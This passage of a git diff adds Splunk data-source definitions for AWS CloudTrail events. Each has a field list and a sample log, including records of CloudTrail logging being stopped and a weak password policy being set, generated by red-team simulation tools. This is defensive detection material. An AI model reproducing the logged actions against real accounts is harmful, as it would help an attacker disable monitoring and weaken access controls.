+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+  "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::111111111111:user/bhavin_cli", "accountId":
+  "111111111111", "accessKeyId": "AKIAYTOGP2RLKQ3U2PDY", "userName": "bhavin_cli"},
+  "eventTime": "2022-06-30T21:26:49Z", "eventSource": "cloudtrail.amazonaws.com",
+  "eventName": "StopLogging", "awsRegion": "us-west-2", "sourceIPAddress": "72.193.184.209",
+  "userAgent": "stratus-red-team_a6a8f8f2-d560-4062-bd0d-c232130cfcc5", "requestParameters":
+  {"name": "my-cloudtrail-trail"}, "responseElements": null, "requestID": "d8b79caa-08d2-4f7e-b93a-73bb7b85f260",
+  "eventID": "9f8d2b82-6e9d-45b8-9055-78d8c00ca416", "readOnly": false, "eventType":
+  "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory":
+  "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256",
+  "clientProvidedHostHeader": "cloudtrail.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/aws_cloudtrail_updateaccountpasswordpolicy.yml b/data_sources/aws_cloudtrail_updateaccountpasswordpolicy.yml
new file mode 100644
index 0000000000..4080c90e4e
--- /dev/null
+++ b/data_sources/aws_cloudtrail_updateaccountpasswordpolicy.yml
@@ -0,0 +1,107 @@
+name: AWS CloudTrail UpdateAccountPasswordPolicy
+id: 35a8cc97-3600-40e1-a5d1-1c2ad5060be0
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail UpdateAccountPasswordPolicy
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.allowUsersToChangePassword
+- requestParameters.hardExpiry
+- requestParameters.minimumPasswordLength
+- requestParameters.requireLowercaseCharacters
+- requestParameters.requireNumbers
+- requestParameters.requireSymbols
+- requestParameters.requireUppercaseCharacters
+- responseElements
+- sessionCredentialFromConsole
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "Root", "principalId":
+  "111111111111", "arn": "arn:aws:iam::111111111111:root", "accountId": "111111111111",
+  "accessKeyId": "ASIASBMSCQHHZZ4THONS", "sessionContext": {"sessionIssuer": {}, "webIdFederationData":
+  {}, "attributes": {"creationDate": "2023-01-26T22:10:41Z", "mfaAuthenticated": "false"}}},
+  "eventTime": "2023-01-26T22:38:59Z", "eventSource": "iam.amazonaws.com", "eventName":
+  "UpdateAccountPasswordPolicy", "awsRegion": "us-east-1", "sourceIPAddress": "23.93.193.7",
+  "userAgent": "AWS Internal", "requestParameters": {"minimumPasswordLength": 6, "requireSymbols":
+  true, "requireNumbers": false, "requireUppercaseCharacters": false, "requireLowercaseCharacters":
+  false, "allowUsersToChangePassword": false, "hardExpiry": false}, "responseElements":
+  null, "requestID": "7685efa9-5c56-451a-bd25-3db520108589", "eventID": "ccc1d5c2-dd72-4798-8023-ed5a4205f2d5",
+  "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId":
+  "111111111111", "eventCategory": "Management", "sessionCredentialFromConsole": "true"}'
diff --git a/data_sources/aws_cloudtrail_updateloginprofile.yml b/data_sources/aws_cloudtrail_updateloginprofile.yml
new file mode 100644
index 0000000000..dcdab36afe
--- /dev/null
+++ b/data_sources/aws_cloudtrail_updateloginprofile.yml
@@ -0,0 +1,97 @@
+name: AWS CloudTrail UpdateLoginProfile
+id: 1db79158-e5d3-4d35-9d3c-586e44e09f1c
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail UpdateLoginProfile
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.userName
+- responseElements
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+  "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::111111111111:user/bhavin_cli", "accountId":
+  "111111111111", "accessKeyId": "AKIAYTOGP2RLLAA6NJUM", "userName": "bhavin_cli"},
+  "eventTime": "2021-03-05T01:02:59Z", "eventSource": "iam.amazonaws.com", "eventName":
+  "UpdateLoginProfile", "awsRegion": "us-east-1", "sourceIPAddress": "73.15.72.101",
+  "userAgent": "aws-cli/2.0.62 Python/3.9.2 Darwin/19.6.0 source/x86_64 command/iam.update-login-profile",
+  "requestParameters": {"userName": "AtomicRedTeam"}, "responseElements": null, "requestID":
+  "08f38478-1749-4fb5-b07c-469d3448777a", "eventID": "033580e7-bbba-4b70-be63-7eeddb04b842",
+  "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "eventCategory":
+  "Management", "recipientAccountId": "111111111111"}'
diff --git a/data_sources/aws_cloudtrail_updatesamlprovider.yml b/data_sources/aws_cloudtrail_updatesamlprovider.yml
new file mode 100644
index 0000000000..018f6fe6dc
--- /dev/null
+++ b/data_sources/aws_cloudtrail_updatesamlprovider.yml
@@ -0,0 +1,187 @@
+name: AWS CloudTrail UpdateSAMLProvider
+id: e5eb628d-711e-499c-87d9-8fa5dee419ec
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail UpdateSAMLProvider
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.sAMLMetadataDocument
+- requestParameters.sAMLProviderArn
+- responseElements.sAMLProviderArn
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.sessionContext.sessionIssuer.accountId
+- userIdentity.sessionContext.sessionIssuer.arn
+- userIdentity.sessionContext.sessionIssuer.principalId
+- userIdentity.sessionContext.sessionIssuer.type
+- userIdentity.sessionContext.sessionIssuer.userName
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId":
+  "AROAYTOGP2RLKFUVAQAIJ:rodsoto@rodsoto.onmicrosoft.com", "arn": "arn:aws:sts::111111111111:assumed-role/rodonmicrotestrole/rodsoto@rodsoto.onmicrosoft.com",
+  "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLMZGPIW6C", "sessionContext":
+  {"sessionIssuer": {"type": "Role", "principalId": "AROAYTOGP2RLKFUVAQAIJ", "arn":
+  "arn:aws:iam::111111111111:role/rodonmicrotestrole", "accountId": "111111111111",
+  "userName": "rodonmicrotestrole"}, "webIdFederationData": {}, "attributes": {"mfaAuthenticated":
+  "false", "creationDate": "2021-01-20T03:10:32Z"}}}, "eventTime": "2021-01-20T03:12:39Z",
+  "eventSource": "iam.amazonaws.com", "eventName": "UpdateSAMLProvider", "awsRegion":
+  "us-east-1", "sourceIPAddress": "66.176.252.11", "userAgent": "aws-internal/3 aws-sdk-java/1.11.930
+  Linux/4.9.230-0.1.ac.223.84.332.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.275-b01
+  java/1.8.0_275 vendor/Oracle_Corporation", "requestParameters": {"sAMLMetadataDocument":
+  "<?xml version=\"1.0\" encoding=\"utf-8\"?><EntityDescriptor ID=\"_6898aaf1-1639-44d4-956b-5bf936af37f1\"
+  entityID=\"https://sts.windows.net/0e8108b1-18e9-41a4-961b-dfcddf92ef08/\" xmlns=\"urn:oasis:names:tc:SAML:2.0:metadata\"><Signature
+  xmlns=\"http://www.w3.org/2000/09/xmldsig#\"><SignedInfo><CanonicalizationMethod
+  Algorithm=\"http://www.w3.org/2001/10/xml-exc-c14n#\" /><SignatureMethod Algorithm=\"http://www.w3.org/2001/04/xmldsig-more#rsa-sha256\"
+  /><Reference URI=\"#_6898aaf1-1639-44d4-956b-5bf936af37f1\"><Transforms><Transform
+  Algorithm=\"http://www.w3.org/2000/09/xmldsig#enveloped-signature\" /><Transform
+  Algorithm=\"http://www.w3.org/2001/10/xml-exc-c14n#\" /></Transforms><DigestMethod
+  Algorithm=\"http://www.w3.org/2001/04/xmlenc#sha256\" /><DigestValue>ncp+pf0e75KdoRTy1PQeu74OKXjcVNM+bnT7Ns6cwQI=</DigestValue></Reference></SignedInfo><SignatureValue>J9PRCq201gGMzMtt4Ye+gsM7xOgrNvDg/usqIMvsyUy2r/MeTBz5FKCK+Okjwm49vyTWUoUioYGiwm/TD2Knv59g1zy+/OjZcmBJgDrCmksFJdkwG/fDlOZQNGuj2qh1CEKL5n6Ipy2z1dQ9XUmhhndtXNnjdZ0fJ9QWufWoxveSCLHcU7eUB9obwq96pbAp+6as0XreMNC/xPv5gDdHfKaIppsXtEwcZY7m1c25jDWqPUTQrtbVC0uryffg1Yu0JLTr646GMTzxulBSpQGRfNf5UT0bUiLtKngi++UHrngKdv3ovWwpVmY82JhG7rMDhkuWZu3LdEFvY3svNxGtsQ==</SignatureValue><KeyInfo><X509Data><X509Certificate>MIIDPzCCAiegAwIBAgIQOpwRqLOiO5dOnZepSd5yJzANBgkqhkiG9w0BAQsFADAhMR8wHQYDVQQDDBZhZGZzLmF0dGFja3JhbmdlLmxvY2FsMB4XDTIxMDEwNjIyMzAyMloXDTIyMDEwNjIyNTAyMlowITEfMB0GA1UEAwwWYWRmcy5hdHRhY2tyYW5nZS5sb2NhbDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKCwp37iASl3qvAbIyYGI1HOwIlZCAuwLZF+ROf0SVpl+KC19nR+ws7NjacsxsugHMUT1gc9On/l0Jn5pF6VFFcPyPsVvaxLJ+YMY0SBcIHp1iQOKfA2jIFXs4eoLzcrOpX0vqkKsZEPsUAN8tz7OYOPyIP4gylV6hh3nNJXQ2ogeTHXmrpI7wDrAY72g9tDCAitRvAu+nZOLnYaQ3YmnJJGZd+YvmRUd7WAwngYEbJss55ZcL/JU3VJQMJ7OGtjFhjayDT/dUdtvBUqsfF27cArbT5WgGm8WX+WWrJTJgqhQ9YpRUXFajt7Ky5fDLG1cuL6FCHpfrBuRsy7MdY/B+0CAwEAAaNzMHEwDgYDVR0PAQH/BAQDAgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDATAhBgNVHREEGjAYghZhZGZzLmF0dGFja3JhbmdlLmxvY2FsMB0GA1UdDgQWBBQCPwpG/CPNUFbkjPjBuXJr1AOIdzANBgkqhkiG9w0BAQsFAAOCAQEAlzPZxjHF8tLmpf2KLeu9OlVSdcJ/vER7H/3gZmDEnNET/FHbY20npgiQgyk2XoM9WBe9zsuDcORfhndUnW+NHaAHZfdTvtvq1wPoqnEFdedRKMoXU7DtcHHnK533/4ysdcpI8rMS4Tg/WTmFHmubs0xc1TGHL4nVPC1p7Tz6ijkluHxkZFjf0VER/lc6LBXxhEgPuX+aYFvMq1Ty8dYbYjQ9C1sKWYavOnR11pB3uGTRYaj0FwTGhP/UfpkKuaKRhx0j1Iwe01rNDl1+tWhAwZXGDFFcJMTx/Z+vCcSlijBLeVCP7mmm0QgFn7AWrqhAUKkqfcVVvYLgi+FTcuJuSA==</X509Certificate></X509Data></KeyInfo></Signature><RoleDescriptor
+  xsi:type=\"fed:SecurityTokenServiceType\" protocolSupportEnumeration=\"http://docs.oasis-open.org/wsfed/federation/200706\"
+  xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:fed=\"http://docs.oasis-open.org/wsfed/federation/200706\"><KeyDescriptor
+  use=\"signing\"><KeyInfo xmlns=\"http://www.w3.org/2000/09/xmldsig#\"><X509Data><X509Certificate>MIIDPzCCAiegAwIBAgIQOpwRqLOiO5dOnZepSd5yJzANBgkqhkiG9w0BAQsFADAhMR8wHQYDVQQDDBZhZGZzLmF0dGFja3JhbmdlLmxvY2FsMB4XDTIxMDEwNjIyMzAyMloXDTIyMDEwNjIyNTAyMlowITEfMB0GA1UEAwwWYWRmcy5hdHRhY2tyYW5nZS5sb2NhbDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKCwp37iASl3qvAbIyYGI1HOwIlZCAuwLZF+ROf0SVpl+KC19nR+ws7NjacsxsugHMUT1gc9On/l0Jn5pF6VFFcPyPsVvaxLJ+YMY0SBcIHp1iQOKfA2jIFXs4eoLzcrOpX0vqkKsZEPsUAN8tz7OYOPyIP4gylV6hh3nNJXQ2ogeTHXmrpI7wDrAY72g9tDCAitRvAu+nZOLnYaQ3YmnJJGZd+YvmRUd7WAwngYEbJss55ZcL/JU3VJQMJ7OGtjFhjayDT/dUdtvBUqsfF27cArbT5WgGm8WX+WWrJTJgqhQ9YpRUXFajt7Ky5fDLG1cuL6FCHpfrBuRsy7MdY/B+0CAwEAAaNzMHEwDgYDVR0PAQH/BAQDAgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDATAhBgNVHREEGjAYghZhZGZzLmF0dGFja3JhbmdlLmxvY2FsMB0GA1UdDgQWBBQCPwpG/CPNUFbkjPjBuXJr1AOIdzANBgkqhkiG9w0BAQsFAAOCAQEAlzPZxjHF8tLmpf2KLeu9OlVSdcJ/vER7H/3gZmDEnNET/FHbY20npgiQgyk2XoM9WBe9zsuDcORfhndUnW+NHaAHZfdTvtvq1wPoqnEFdedRKMoXU7DtcHHnK533/4ysdcpI8rMS4Tg/WTmFHmubs0xc1TGHL4nVPC1p7Tz6ijkluHxkZFjf0VER/lc6LBXxhEgPuX+aYFvMq1Ty8dYbYjQ9C1sKWYavOnR11pB3uGTRYaj0FwTGhP/UfpkKuaKRhx0j1Iwe01rNDl1+tWhAwZXGDFFcJMTx/Z+vCcSlijBLeVCP7mmm0QgFn7AWrqhAUKkqfcVVvYLgi+FTcuJuSA==</X509Certificate></X509Data></KeyInfo></KeyDescriptor><KeyDescriptor
+  use=\"signing\"><KeyInfo xmlns=\"http://www.w3.org/2000/09/xmldsig#\"><X509Data><X509Certificate>MIIC8DCCAdigAwIBAgIQMN9XaFEOfIpMuOqq+1JFzzANBgkqhkiG9w0BAQsFADA0MTIwMAYDVQQDEylNaWNyb3NvZnQgQXp1cmUgRmVkZXJhdGVkIFNTTyBDZXJ0aWZpY2F0ZTAeFw0yMTAxMTcxODU2MTZaFw0yNDAxMTcyMTU2MTRaMDQxMjAwBgNVBAMTKU1pY3Jvc29mdCBBenVyZSBGZWRlcmF0ZWQgU1NPIENlcnRpZmljYXRlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2GO3vs2HPr+EXEVnWNRDOIjxS5tP2i9xq/399CAl/sWSbJkooGjcCKWf0DN1cGbbbrzL/V+Hor/htEFBpsbUsL8NbaE5pZOnH3oWquiHFiMs1t3Dh4dSVViKyMgIx/i5j4qUW74fYHvgead3kTIV7oSIYHXPNSF6SGLR8qWgRSCLre5P80PnzQmFoI1MbfJbJWf4rWBRVylJaamRFi8X/9byGAQKNYtrjnxCPtdvqUG03EMvwrUCTOM49qnuUhHUCtrIk8MQ1/xzHePkWT3OXmfCi0ABDFAnb9GH763rLlrawVaZKMzmICQ/Rts3+NUm0urSbPlUq1+IfbCsRCwz/QIDAQABMA0GCSqGSIb3DQEBCwUAA4IBAQA+ZOJcY1oGsj/LLa0KLhlUolA7dojhwDtZFPRInLcyBQ6G2fkEZr7jdgY0vg8X86vFCw2JLIC5UmUrXsC1YGxD0kzdMAqr06uVOxGKD/QCRKfes3AYqv/axoJpSm1uZP2066816bYIpOMjcc5yQaEzFh6Y2d5Ovd+DJ/BLVmTFuKs9p9q5JCpOQQT73c0actHdXsjZeM0iHbuWtQOu6LHJuQRbl7BCdKblLvpnoF7DrAHLq1xArcSUEuXa590aga7Ld9P/6BrTQ26QdGGfmJlRiaWh5iu22lbI169NlFd+EmgXIFWK0Qu6i7zyNkGTTA2GOOG9Z/vNIGKRxmV4l7KN</X509Certificate></X509Data></KeyInfo></KeyDescriptor><fed:ClaimTypesOffered><auth:ClaimType
+  Uri=\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name\" xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>Name</auth:DisplayName><auth:Description>The
+  mutable display name of the user.</auth:Description></auth:ClaimType><auth:ClaimType
+  Uri=\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier\" xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>Subject</auth:DisplayName><auth:Description>An
+  immutable, globally unique, non-reusable identifier of the user that is unique to
+  the application for which a token is issued.</auth:Description></auth:ClaimType><auth:ClaimType
+  Uri=\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname\" xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>Given
+  Name</auth:DisplayName><auth:Description>First name of the user.</auth:Description></auth:ClaimType><auth:ClaimType
+  Uri=\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname\" xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>Surname</auth:DisplayName><auth:Description>Last
+  name of the user.</auth:Description></auth:ClaimType><auth:ClaimType Uri=\"http://schemas.microsoft.com/identity/claims/displayname\"
+  xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>Display
+  Name</auth:DisplayName><auth:Description>Display name of the user.</auth:Description></auth:ClaimType><auth:ClaimType
+  Uri=\"http://schemas.microsoft.com/identity/claims/nickname\" xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>Nick
+  Name</auth:DisplayName><auth:Description>Nick name of the user.</auth:Description></auth:ClaimType><auth:ClaimType
+  Uri=\"http://schemas.microsoft.com/ws/2008/06/identity/claims/authenticationinstant\"
+  xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>Authentication
+  Instant</auth:DisplayName><auth:Description>The time (UTC) when the user is authenticated
+  to Windows Azure Active Directory.</auth:Description></auth:ClaimType><auth:ClaimType
+  Uri=\"http://schemas.microsoft.com/ws/2008/06/identity/claims/authenticationmethod\"
+  xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>Authentication
+  Method</auth:DisplayName><auth:Description>The method that Windows Azure Active
+  Directory uses to authenticate users.</auth:Description></auth:ClaimType><auth:ClaimType
+  Uri=\"http://schemas.microsoft.com/identity/claims/objectidentifier\" xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>ObjectIdentifier</auth:DisplayName><auth:Description>Primary
+  identifier for the user in the directory. Immutable, globally unique, non-reusable.</auth:Description></auth:ClaimType><auth:ClaimType
+  Uri=\"http://schemas.microsoft.com/identity/claims/tenantid\" xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>TenantId</auth:DisplayName><auth:Description>Identifier
+  for the user''s tenant.</auth:Description></auth:ClaimType><auth:ClaimType Uri=\"http://schemas.microsoft.com/identity/claims/identityprovider\"
+  xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>IdentityProvider</auth:DisplayName><auth:Description>Identity
+  provider for the user.</auth:Description></auth:ClaimType><auth:ClaimType Uri=\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress\"
+  xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>Email</auth:DisplayName><auth:Description>Email
+  address of the user.</auth:Description></auth:ClaimType><auth:ClaimType Uri=\"http://schemas.microsoft.com/ws/2008/06/identity/claims/groups\"
+  xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>Groups</auth:DisplayName><auth:Description>Groups
+  of the user.</auth:Description></auth:ClaimType><auth:ClaimType Uri=\"http://schemas.microsoft.com/identity/claims/accesstoken\"
+  xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>External
+  Access Token</auth:DisplayName><auth:Description>Access token issued by external
+  identity provider.</auth:Description></auth:ClaimType><auth:ClaimType Uri=\"http://schemas.microsoft.com/ws/2008/06/identity/claims/expiration\"
+  xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>External
+  Access Token Expiration</auth:DisplayName><auth:Description>UTC expiration time
+  of access token issued by external identity provider.</auth:Description></auth:ClaimType><auth:ClaimType
+  Uri=\"http://schemas.microsoft.com/identity/claims/openid2_id\" xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>External
+  OpenID 2.0 Identifier</auth:DisplayName><auth:Description>OpenID 2.0 identifier
+  issued by external identity provider.</auth:Description></auth:ClaimType><auth:ClaimType
+  Uri=\"http://schemas.microsoft.com/claims/groups.link\" xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>GroupsOverageClaim</auth:DisplayName><auth:Description>Issued
+  when number of user''s group claims exceeds return limit.</auth:Description></auth:ClaimType><auth:ClaimType
+  Uri=\"http://schemas.microsoft.com/ws/2008/06/identity/claims/role\" xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>Role
+  Claim</auth:DisplayName><auth:Description>Roles that the user or Service Principal
+  is attached to</auth:Description></auth:ClaimType><auth:ClaimType Uri=\"http://schemas.microsoft.com/ws/2008/06/identity/claims/wids\"
+  xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>RoleTemplate
+  Id Claim</auth:DisplayName><auth:Description>Role template id of the Built-in Directory
+  Roles that the user is a member of</auth:Description></auth:ClaimType></fed:ClaimTypesOffered><fed:SecurityTokenServiceEndpoint><wsa:EndpointReference
+  xmlns:wsa=\"http://www.w3.org/2005/08/addressing\"><wsa:Address>https://login.microsoftonline.com/0e8108b1-18e9-41a4-961b-dfcddf92ef08/wsfed</wsa:Address></wsa:EndpointReference></fed:SecurityTokenServiceEndpoint><fed:PassiveRequestorEndpoint><wsa:EndpointReference
+  xmlns:wsa=\"http://www.w3.org/2005/08/addressing\"><wsa:Address>https://login.microsoftonline.com/0e8108b1-18e9-41a4-961b-dfcddf92ef08/wsfed</wsa:Address></wsa:EndpointReference></fed:PassiveRequestorEndpoint></RoleDescriptor><RoleDescriptor
+  xsi:type=\"fed:ApplicationServiceType\" protocolSupportEnumeration=\"http://docs.oasis-open.org/wsfed/federation/200706\"
+  xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:fed=\"http://docs.oasis-open.org/wsfed/federation/200706\"><KeyDescriptor
+  use=\"signing\"><KeyInfo xmlns=\"http://www.w3.org/2000/09/xmldsig#\"><X509Data><X509Certificate>MIIDPzCCAiegAwIBAgIQOpwRqLOiO5dOnZepSd5yJzANBgkqhkiG9w0BAQsFADAhMR8wHQYDVQQDDBZhZGZzLmF0dGFja3JhbmdlLmxvY2FsMB4XDTIxMDEwNjIyMzAyMloXDTIyMDEwNjIyNTAyMlowITEfMB0GA1UEAwwWYWRmcy5hdHRhY2tyYW5nZS5sb2NhbDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKCwp37iASl3qvAbIyYGI1HOwIlZCAuwLZF+ROf0SVpl+KC19nR+ws7NjacsxsugHMUT1gc9On/l0Jn5pF6VFFcPyPsVvaxLJ+YMY0SBcIHp1iQOKfA2jIFXs4eoLzcrOpX0vqkKsZEPsUAN8tz7OYOPyIP4gylV6hh3nNJXQ2ogeTHXmrpI7wDrAY72g9tDCAitRvAu+nZOLnYaQ3YmnJJGZd+YvmRUd7WAwngYEbJss55ZcL/JU3VJQMJ7OGtjFhjayDT/dUdtvBUqsfF27cArbT5WgGm8WX+WWrJTJgqhQ9YpRUXFajt7Ky5fDLG1cuL6FCHpfrBuRsy7MdY/B+0CAwEAAaNzMHEwDgYDVR0PAQH/BAQDAgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDATAhBgNVHREEGjAYghZhZGZzLmF0dGFja3JhbmdlLmxvY2FsMB0GA1UdDgQWBBQCPwpG/CPNUFbkjPjBuXJr1AOIdzANBgkqhkiG9w0BAQsFAAOCAQEAlzPZxjHF8tLmpf2KLeu9OlVSdcJ/vER7H/3gZmDEnNET/FHbY20npgiQgyk2XoM9WBe9zsuDcORfhndUnW+NHaAHZfdTvtvq1wPoqnEFdedRKMoXU7DtcHHnK533/4ysdcpI8rMS4Tg/WTmFHmubs0xc1TGHL4nVPC1p7Tz6ijkluHxkZFjf0VER/lc6LBXxhEgPuX+aYFvMq1Ty8dYbYjQ9C1sKWYavOnR11pB3uGTRYaj0FwTGhP/UfpkKuaKRhx0j1Iwe01rNDl1+tWhAwZXGDFFcJMTx/Z+vCcSlijBLeVCP7mmm0QgFn7AWrqhAUKkqfcVVvYLgi+FTcuJuSA==</X509Certificate></X509Data></KeyInfo></KeyDescriptor><KeyDescriptor
+  use=\"signing\"><KeyInfo xmlns=\"http://www.w3.org/2000/09/xmldsig#\"><X509Data><X509Certificate>MIIC8DCCAdigAwIBAgIQMN9XaFEOfIpMuOqq+1JFzzANBgkqhkiG9w0BAQsFADA0MTIwMAYDVQQDEylNaWNyb3NvZnQgQXp1cmUgRmVkZXJhdGVkIFNTTyBDZXJ0aWZpY2F0ZTAeFw0yMTAxMTcxODU2MTZaFw0yNDAxMTcyMTU2MTRaMDQxMjAwBgNVBAMTKU1pY3Jvc29mdCBBenVyZSBGZWRlcmF0ZWQgU1NPIENlcnRpZmljYXRlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2GO3vs2HPr+EXEVnWNRDOIjxS5tP2i9xq/399CAl/sWSbJkooGjcCKWf0DN1cGbbbrzL/V+Hor/htEFBpsbUsL8NbaE5pZOnH3oWquiHFiMs1t3Dh4dSVViKyMgIx/i5j4qUW74fYHvgead3kTIV7oSIYHXPNSF6SGLR8qWgRSCLre5P80PnzQmFoI1MbfJbJWf4rWBRVylJaamRFi8X/9byGAQKNYtrjnxCPtdvqUG03EMvwrUCTOM49qnuUhHUCtrIk8MQ1/xzHePkWT3OXmfCi0ABDFAnb9GH763rLlrawVaZKMzmICQ/Rts3+NUm0urSbPlUq1+IfbCsRCwz/QIDAQABMA0GCSqGSIb3DQEBCwUAA4IBAQA+ZOJcY1oGsj/LLa0KLhlUolA7dojhwDtZFPRInLcyBQ6G2fkEZr7jdgY0vg8X86vFCw2JLIC5UmUrXsC1YGxD0kzdMAqr06uVOxGKD/QCRK